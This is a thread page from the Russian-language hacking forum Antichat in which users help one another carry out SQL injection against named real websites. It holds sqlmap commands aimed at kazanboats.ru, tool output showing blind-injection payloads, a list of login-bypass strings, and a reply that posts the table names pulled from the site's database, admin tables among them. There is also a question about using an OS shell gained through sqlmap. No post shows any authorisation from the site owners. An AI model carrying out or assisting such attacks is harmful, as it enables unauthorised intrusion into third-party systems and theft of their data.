HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #241  
Старый 22.06.2015, 20:38
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Объясните, пожалуйста, почему так?

Почему "5063" и "tviX"?
 
Ответить с цитированием

  #242  
Старый 22.06.2015, 20:41
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от Muracha  
Muracha said:

Объясните, пожалуйста, почему так?
Почему "5063" и "tviX"?
можно было написать и AND 1=1 AND 'Hack'='Hack

Посмотрите для лучшего понимания видео

и статья http://voice0fblackhat.blogspot.se/2...injection.html
 
Ответить с цитированием

  #243  
Старый 22.06.2015, 21:17
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Muracha  
Muracha said:

Объясните, пожалуйста, почему так?
Почему "5063" и "tviX"?
это sqlmap так выдает.

у вас фильтр на SELECT, и не в запросе в базу, а в POST/GET/COOKIE запросах. подобрать вектор вряд ли удастся, SELECT нужен везде.
 
Ответить с цитированием

  #244  
Старый 22.06.2015, 22:08
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Последний раз я этим занимался лет 7 назад. По необходимости. Потом забросил.

Пришлось вернуться и столько много всего..вектора, новые методы атак. Новые приложения.

Все руками делал, а сейчас с помощью программы вытаскивать данные не составляет проблемы.

Все так упрощенно и просто.

В целом, я разобрался с этим.

Но вопрос с админкой - остался открытым.

Как обойти фильтрацию, если "Admin' --" не принимает? и тому подобное.
 
Ответить с цитированием

  #245  
Старый 23.06.2015, 10:48
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Не могу выдернуть список таблиц.

Запрос стандартный

root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables -D etyle2_kazboats

и такой

root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables -D --no-cast etyle2_kazboats

Программа перебирает таблицы из словаря и пишет, что они не найдены.

Неужели оттого, что фильтруется select?

Код:
Code:
root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables  -D --no-cast etyle2_kazboats

  sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:36:54

[09:36:55] [INFO] resuming back-end DBMS 'mysql'
[09:36:55] [INFO] testing connection to the target URL
[09:36:55] [INFO] heuristics detected web page charset 'windows-1251'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=59' AND 2198=2198 AND 'naaT'='naaT

  Type: AND/OR time-based blind
  Title: MySQL > 5.0.11 AND time-based blind
  Payload: id=59' AND SLEEP(5) AND 'GtmX'='GtmX
---
[09:36:55] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[09:36:55] [INFO] fetching tables for database: '--no-cast'
[09:36:55] [INFO] fetching number of tables for database '--no-cast'
[09:36:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:36:55] [INFO] retrieved:
[09:36:56] [WARNING] time-based comparison requires larger statistical model, please wait...........................
[09:37:07] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors

[09:37:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[09:37:07] [WARNING] unable to retrieve the number of tables for database '--no-cast'
[09:37:07] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[09:37:11] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.kazanboats.ru'
[*] shutting down at 09:37:11
 
Ответить с цитированием

  #246  
Старый 23.06.2015, 11:18
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Muracha  
Muracha said:

Не могу выдернуть список таблиц.
Запрос стандартный
root@localhost:~# sqlmap -u "
http://www.kazanboats.ru/index.php?id=59
" --tables -D etyle2_kazboats
и такой
root@localhost:~# sqlmap -u "
http://www.kazanboats.ru/index.php?id=59
" --tables -D --no-cast etyle2_kazboats
Программа перебирает таблицы из словаря и пишет, что они не найдены.
Неужели оттого, что фильтруется select?
Код:
Code:
root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables  -D --no-cast etyle2_kazboats

  sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:36:54

[09:36:55] [INFO] resuming back-end DBMS 'mysql'
[09:36:55] [INFO] testing connection to the target URL
[09:36:55] [INFO] heuristics detected web page charset 'windows-1251'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=59' AND 2198=2198 AND 'naaT'='naaT

  Type: AND/OR time-based blind
  Title: MySQL > 5.0.11 AND time-based blind
  Payload: id=59' AND SLEEP(5) AND 'GtmX'='GtmX
---
[09:36:55] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[09:36:55] [INFO] fetching tables for database: '--no-cast'
[09:36:55] [INFO] fetching number of tables for database '--no-cast'
[09:36:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:36:55] [INFO] retrieved:
[09:36:56] [WARNING] time-based comparison requires larger statistical model, please wait...........................
[09:37:07] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors

[09:37:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[09:37:07] [WARNING] unable to retrieve the number of tables for database '--no-cast'
[09:37:07] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[09:37:11] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.kazanboats.ru'
[*] shutting down at 09:37:11
чтобы вывести имя бд SELECT не нужен, просто database() или schema(). а для вывода таблиц через blind синтаксис только с SELECT. вы же из базы достаете информацию, куда вы без выборки? я пробовал обойти - не выходит
 
Ответить с цитированием

  #247  
Старый 23.06.2015, 11:49
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

Понял. Спасибо большое.

Тогда можно ли при помощи sqlmap выдернуть или авторизоваться через http://www.kazanboats.ru/admin/login.php?

Комбинация admin' : " or 1=1/* ' or 1=1--,

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

Почему-то не проходят.

Это связанно с фильтрацией или с неправильно составленным запросом?
 
Ответить с цитированием

  #248  
Старый 23.06.2015, 12:09
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от Muracha  
Muracha said:

Понял. Спасибо большое.
Тогда можно ли при помощи sqlmap выдернуть или авторизоваться
Да

Код:
Code:
-u "http://www.kazanboats.ru/admin/login.php" --eta --random-agent --threads=8   --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
Database: etyle2_kazboats

[25 tables]

+-------------------------+

| kboats_adm_groups |

| kboats_adm_log |

| kboats_adm_users |

| kboats_foto |

| kboats_foto_category |

| kboats_guestbook |

| kboats_guestbook_conf |

| kboats_guestbook_golos |

| kboats_news |

| kboats_news_banner |

| kboats_news_cat |

| kboats_news_comments |

| kboats_news_conf |

| kboats_news_users |

| kboats_site_banner |

| kboats_site_content |

| kboats_site_menu |

| kboats_site_modules |

| kboats_site_option |

| kboats_stock |

| kboats_stock_brands |

| kboats_stock_cat_option |

| kboats_stock_category |

| ksz_admin_menu |

| ksz_info |

+-------------------------+
 
Ответить с цитированием

  #249  
Старый 23.06.2015, 14:39
reuvenmatbil
Guest
Сообщений: n/a
Провел на форуме:
5818

Репутация: 0
По умолчанию

при запуске sqlmap с параметром --os-shell

выдает

[06:35:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER

os-shell>

как дальше действовать чтоб получить доступ, какие команды существуют?

права на запись есть
 
Ответить с цитированием

  #250  
Старый 23.06.2015, 15:07
man4747
Guest
Сообщений: n/a
Провел на форуме:
1105

Репутация: 0
По умолчанию

Помогите, пожалуйста.

http://www.arbet.am/search.php?CategoryID=1'a
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ